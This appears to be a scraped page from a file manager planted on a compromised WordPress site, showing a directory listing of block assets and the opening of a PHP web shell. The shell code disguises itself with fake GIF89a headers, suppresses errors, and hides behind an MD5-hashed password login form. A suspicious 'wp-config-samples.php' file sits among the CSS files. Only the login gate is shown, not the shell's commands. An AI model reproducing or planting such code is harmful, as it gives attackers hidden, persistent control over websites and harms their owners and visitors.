PATH:
home
/
lab2454c
/
credityork.com
/
wp-includes
/
blocks
/
post-author
<!-- GIF89;a --> <!-- GIF89;a --> <!-- GIF89;a --> <?php $password = 'd7b82465fd257c292e88007a69d33799'; error_reporting(0); set_time_limit(0); session_start(); if (!isset($_SESSION['loggedInz'])) { $_SESSION['loggedInz'] = false; } if (isset($_POST['password'])) { if (md5($_POST['password']) == $password) { $_SESSION['loggedInz'] = true; } } if (!$_SESSION['loggedInz']): ?> <html><head><title> </title></head> <body> <p align="center"><center><font style="font-size:13px" color="#008000" face="Trebuchet MS"> <form method="post"> <input type="password" name="password"> <input type="submit" name="submit" value=" >>"> </form> </body> </html> <?php exit(); endif; ?> <?php error_reporting(0);
[-] style-rtl.css
[edit]
[+]
..
[-] style.min.css
[edit]
[-] style.css
[edit]
[-] style-rtl.min.css
[edit]
[-] wp-config-samples.php
[edit]
[-] block.json
[edit]